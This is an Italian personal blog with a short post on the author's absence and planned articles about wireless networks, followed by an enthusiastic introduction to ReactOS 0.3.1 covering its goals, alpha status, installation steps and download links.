I motivi di questa prolungata assenza: le ferie d’Agosto, stupende… passate interemente con la mia dolcissima ragazza, colgo l’occasione per gli auguri, felice mesiversario amore (oggi sono 7 mesi ;-p).

Settembre il fatidico rientro a scuola, non riesco a ritagliare dello spazio per il blog visto che il pomeriggio faccio anche lo stagista presso un’azienda informatica che si occupa di gestione banche dati, programmazione di piattaforme gestionali sul web, reti wireless, consulenze varie ecc… .

Mi sento in dovere di ringraziare gli oltre 30000 visitatori in soli tre mesi, spero di continuare a riscuotere ulteriore successo con i miei prossimi articoli, un anticipazione che posso darvi è che i miei prossimi post tratteranno spesso di un argomento che ultimamente mi sta affascinando tanto, l’argomento in questione è “il mondo delle reti wireless e tutti i suoi lati nascosti”.

Grazie a tutti per la pazienza! A presto!

ReactOS è una grandiosa sfida Open Source, un sistema compatibile con Windows ma che non ha gli stessi problemi.

Il Team di ReactOS ha un obiettivo fondamentale: il dialogo binario compatibile con i driver e sotware applicativi di Windows.

Il progetto ReactOS è giovanissimo, ma si sta espandendo sempre più, sul sito ufficiale sono linkati tantissimi forum, canali IRC, blog degli sviluppatori, da queste fonti possiamo ricavare tantissime informazioni oltre alle normalissime FAQ, molto sviluppati e frequentati sono le Mailing List e il Forum italiano.

E’ un progetto grandioso, i sorgenti sono disponibili per tutti, ha un funzionamento uguale a Windows anche se il codice è diverso.

ReactOS 0.3.1 è ancora in Alpha, in pieno sviluppo, non è il caso di affidare a questo sistema il lavoro di tutti i giorni, ci sono ancora tanti bug ma il sistema funziona, abbiamo la suite di Open Office e AbiWord che vanno alla grande, se abbiamo un cd della suite Microsft Office possiamo pure provarla, sono già stati testati con successo i giochi basati su OpenGL come come Deus, Quake e Unreal Turnament girano benissimo.

ReactOS ha un installazione similissima al DOS, alla prima schermata premiamo invio confermando la nostra intenzione di installarlo, successivamente settiamo il layout di tastiera, il tipo di schermo e tutto il resto.

Quando abbiamo finito selezioniamo “Accet the device setting” e premiamo invio, adesso parte l’installazione del sistema operativo, appena terminata passiamo a configurare i parametri del sistema: date e ora, fuso orario ecc…

Adesso ci ritroviamo una schermata molto rassomigliante a quella di Windows, con i soliti menù e le solite finestre.

Perché non installarlo o provare la Live CD senza moficare nulla; possiamo anche contribuire al suo sviluppo, nella speranza futura che questo S.0 diventi bello robusto, così potremo finalmente far cessare lo stupido “monopolio” Microsoft sul mondo dei Personal Computer.

Sito ufficiale del progetto -> ReactOS

Download ReactOS 0.3.1 -> QUI!

Download LiveCD -> QUI!